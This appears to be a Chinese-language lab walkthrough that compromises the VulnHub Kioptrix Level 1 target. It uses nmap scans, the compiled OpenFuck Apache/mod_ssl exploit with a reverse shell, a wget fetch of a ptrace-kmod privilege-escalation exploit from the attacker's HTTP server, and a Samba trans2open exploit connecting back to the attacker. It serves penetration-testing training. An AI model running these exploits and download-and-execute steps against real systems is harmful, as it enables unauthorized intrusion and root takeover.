1.   准备环境

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载靶机kioptrix-1。

靶机环境配置独立网段(192.168.5.0/24),单网卡DHCP自动获得IP,kali双网卡,一个接入靶机网络,一个接入管理网络。

1720347221_668a6a55006eb3bd6a946.png!small?1720347224396

2.    探测靶机IP

nmap –sn 192.168.5.0/24

1720347257_668a6a7912457cb9d0642.png!small?1720347263069

3.     扫描靶机服务端口

nmap –A 192.168.5.108

1720347274_668a6a8a0e252c366cba4.png!small?1720347278712

nmap --script=vuln 192.168.5.108

1720347297_668a6aa122803d04cc89d.png!small?1720347300991

      高危组件和服务:

  •       apache 1.3.20
  •       smbd版本未知

4.     尝试渗透

4.1    apache 1.3.20漏洞

searchsploit apache 1.3.20

1720347980_668a6d4c5b5d1925de778.png!small?17203479839001720347989_668a6d55be5c70b9ca1e0.png!small?1720347993383

gcc -o OpenFuck /usr/share/exploitdb/exploits/unix/remote/47080.c –lcrypto

查看帮助,根据操作系统不同,参数选择有所不同。

./OpenFuck -h | grep 1.3.20

1720348010_668a6d6a36a51d414ec65.png!small?1720348014349

根据nmap服务探测结果,靶机操作系统为redhat,故选择尝试0x6a/0x6b

1720348022_668a6d760f397be68b0db.png!small?1720348025452

./OpenFuck 0x6b 192.168.5.108 443 -c 50

1720348030_668a6d7e620af06005338.png!small?1720348034759

成功建立反弹shell,为apache用户,漏洞利用程序会自动下载本地提权的工具,但是因为内网不通,下载失败,提权失败,需要手动下载该提权工具,上传至靶机/tmp目录下:

// kali
python3 -m http.server --bind 0.0.0.0 9000
// 靶机
cd /tmp
wget http://192.168.5.2:9000/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c -B /usr/bin

1720348043_668a6d8bdd3b5913b40ed.png!small?1720348047411

再次执行(50不一定每次都成功,放大到60)

./OpenFuck 0x6b 192.168.5.108 443 -c 60

1720348057_668a6d9905e9ddfce3cba.png!small?1720348061011

本地提权成功,已经拿到root用户。

4.2    apache 1.3.20漏洞

nmap未探测到samba服务的版本号,使用MSF尝试探测,探测到版本号为2.2.1a。

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.5.108
msf6 auxiliary(scanner/smb/smb_version) > run

1720348077_668a6dadd8582061bdc9a.png!small?1720348081444

漏洞库匹配:

searchsploit samba 2.2

1720348085_668a6db592e866cadea9e.png!small?1720348093332

gcc /usr/share/exploitdb/exploits/multiple/remote/10.c -o smb
./smb -h

1720348092_668a6dbc4175a9a636838.png!small?1720348095768

./smb -b 0 -c 192.168.5.2 192.168.5.108

1720348097_668a6dc1d2aa804cfa9d8.png!small?1720348101453

通过samba漏洞渗透成功。

声明:本站大部分文章均为本站原创发布。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。